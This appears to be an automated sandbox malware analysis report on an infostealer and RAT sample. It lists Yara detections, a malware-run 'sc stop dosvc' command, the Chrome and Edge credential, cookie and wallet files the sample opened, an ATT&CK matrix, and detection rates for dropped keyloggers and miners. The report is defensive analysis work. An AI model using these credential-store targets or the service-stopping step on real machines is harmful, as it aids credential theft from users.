Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1878137948.00000235B9F86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1878137948.00000235B9F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: based.exe PID: 7840, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI78122\rarreg.key, type: DROPPED

Yara detected Discord Token Stealer

Source: Yara match	File source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Yara detected Millenuim RAT

Source: Yara match	File source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 7840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxxz
Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodusz
Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior

Source: Yara match	File source: 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 7840, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1878137948.00000235B9F86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1878137948.00000235B9F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: based.exe PID: 7840, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI78122\rarreg.key, type: DROPPED

Yara detected Discord Token Stealer

Source: Yara match	File source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Yara detected Millenuim RAT

Source: Yara match	File source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 7840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	111 Windows Management Instrumentation	1 Scripting	1 Abuse Elevation Control Mechanism	41 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	11 DLL Side-Loading	11 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 Credential API Hooking	3 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	13 Command and Scripting Interpreter	11 Windows Service	11 Windows Service	1 Abuse Elevation Control Mechanism	1 Input Capture	46 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Service Execution	11 Registry Run Keys / Startup Folder	812 Process Injection	21 Obfuscated Files or Information	NTDS	431 Security Software Discovery	Distributed Component Object Model	1 Credential API Hooking	5 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Registry Run Keys / Startup Folder	121 Software Packing	LSA Secrets	3 Process Discovery	SSH	1 Input Capture	6 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	241 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	4 Rootkit	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	112 Masquerading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	241 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	812 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Files and Directories	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TS-240605-Millenium1.exe	28%	ReversingLabs	Win64.Trojan.Generic
TS-240605-Millenium1.exe	36%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\Microsoft\hacn.exe	100%	Avira	TR/Drop.Agent.flqmj
C:\ProgramData\setup.exe	100%	Avira	TR/CoinMiner.lnxah
C:\Program Files\Google\Chrome\updater.exe	100%	Avira	TR/CoinMiner.lnxah
C:\ProgramData\main.exe	100%	Avira	TR/Spy.KeyLogger.kapbl
C:\ProgramData\svchost.exe	100%	Avira	TR/PSW.Agent.lninx
C:\ProgramData\Microsoft\based.exe	100%	Avira	HEUR/AGEN.1351111
C:\ProgramData\Microsoft\hacn.exe	100%	Joe Sandbox ML
C:\ProgramData\setup.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	100%	Joe Sandbox ML
C:\ProgramData\main.exe	100%	Joe Sandbox ML
C:\ProgramData\svchost.exe	100%	Joe Sandbox ML
C:\ProgramData\Microsoft\based.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	88%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\ProgramData\Microsoft\based.exe	51%	ReversingLabs	Win64.Trojan.Lazy
C:\ProgramData\Microsoft\hacn.exe	67%	ReversingLabs	Win64.Trojan.Generic
C:\ProgramData\main.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\ProgramData\setup.exe	88%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\ProgramData\svchost.exe	74%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\_brotli.cp310-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\_cffi_backend.cp310-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\_pytransform.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
